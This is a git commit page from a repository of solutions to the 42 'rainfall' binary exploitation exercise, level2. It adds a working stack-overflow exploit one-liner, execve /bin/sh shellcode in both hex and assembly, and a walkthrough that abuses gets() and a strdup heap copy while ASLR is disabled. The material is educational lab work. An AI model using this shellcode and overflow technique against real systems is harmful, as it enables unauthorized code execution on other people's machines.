starnakin/42_rainfall
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

level2 done

Browse Source
This commit is contained in:
0x35c 2025-04-28 17:09:58 +02:00
parent 9e787cb6b9
commit 291c839668
4 changed files with 43 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
level2/ressources/exploit Normal file
View File

@ -0,0 +1 @@
(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) | ./level2

25
level2/ressources/linux_shell.s Normal file
View File

@ -0,0 +1,25 @@
; run /bin/sh and normal exit
; author @cocomelonc
; nasm -f elf32 -o example3.o example3.asm
; ld -m elf_i386 -o example3 example3.o && ./example3
; 32-bit linux
section .bss
section .text
global _start ; must be declared for linker
_start: ; linker entry point
; xoring anything with itself clears itself:
xor eax, eax ; zero out eax
xor ebx, ebx ; zero out ebx
xor ecx, ecx ; zero out ecx
xor edx, edx ; zero out edx
push eax ; string terminator
push 0x68732f6e ; "hs/n"
push 0x69622f2f ; "ib//"
mov ebx, esp ; "//bin/sh",0 pointer is ESP
mov al, 0xb ; mov eax, 11: execve
int 0x80 ; syscall

6
level2/source.c
View File

@ -9,8 +9,10 @@ static void p(void)
fflush(stdout); fflush(stdout);
gets(buf); gets(buf);
printf("(%p\n)", uwu); if ((uwu & 0xb0000000) == 0xb0000000) {
exit(1); printf("(%p\n)", uwu);
exit(1);
}
puts(buf); puts(buf);
strdup(buf); strdup(buf);
return; return;

13
level2/walkthrough Normal file
View File

@ -0,0 +1,13 @@
# Level2
Using ghidra, we can decompile the code and see that it fills a buffer of 76 bytes using the deprecated (unsafe) function `gets`.
Then, it will check if the return address hasn't been overwritten to and thus prevent us to exploit this vulnerability...
Since it calls `strdup` at the end of the program, we can insert a piece of code executing a linux shell through asm instructions. This will be copied to the heap, and since the ASLR is disabled, the address of where `strdup` will copy the content of the buffer will always be the same (we can find it using `ltrace ./binary`).
For the payload, everything is explained here (thanks cocomelonc UwU):
https://cocomelonc.github.io/tutorial/2021/10/09/linux-shellcoding-1.html
We can then execute this command (similar to the previous one):
`(python -c 'print "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A" * 55 + "\x08\xa0\x04\x08"' ; cat) | ./level2`
Where we copy our linux shell code to the heap, then fill the buffer until after `eip`.
Finally, we can insert the address where our code has been copied so it will be executed when the `return` instruction is called.